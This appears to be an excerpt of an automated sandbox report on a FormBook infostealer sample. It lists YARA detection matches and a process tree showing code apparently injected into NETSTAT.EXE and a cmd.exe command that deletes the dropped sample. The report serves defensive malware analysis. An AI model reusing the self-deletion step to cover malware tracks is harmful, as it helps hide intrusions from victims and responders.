                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:low

                                                        Analysis Process: explorer.exe PID: 3424 Parent PID: 3984

                                                        General

                                                        Start time:13:14:23
                                                        Start date:22/07/2021
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Explorer.EXE
                                                        Imagebase:0x7ff6fee60000
                                                        File size:3933184 bytes
                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Analysis Process: NETSTAT.EXE PID: 7056 Parent PID: 3424

                                                        General

                                                        Start time:13:14:52
                                                        Start date:22/07/2021
                                                        Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                                        Imagebase:0xbb0000
                                                        File size:32768 bytes
                                                        MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:moderate

                                                        Analysis Process: cmd.exe PID: 7012 Parent PID: 7056

                                                        General

                                                        Start time:13:14:57
                                                        Start date:22/07/2021
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:/c del 'C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe'
                                                        Imagebase:0x11d0000
                                                        File size:232960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Analysis Process: conhost.exe PID: 6324 Parent PID: 7012

                                                        General

                                                        Start time:13:14:57
                                                        Start date:22/07/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff724c50000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Disassembly

                                                        Code Analysis

                                                        Reset < >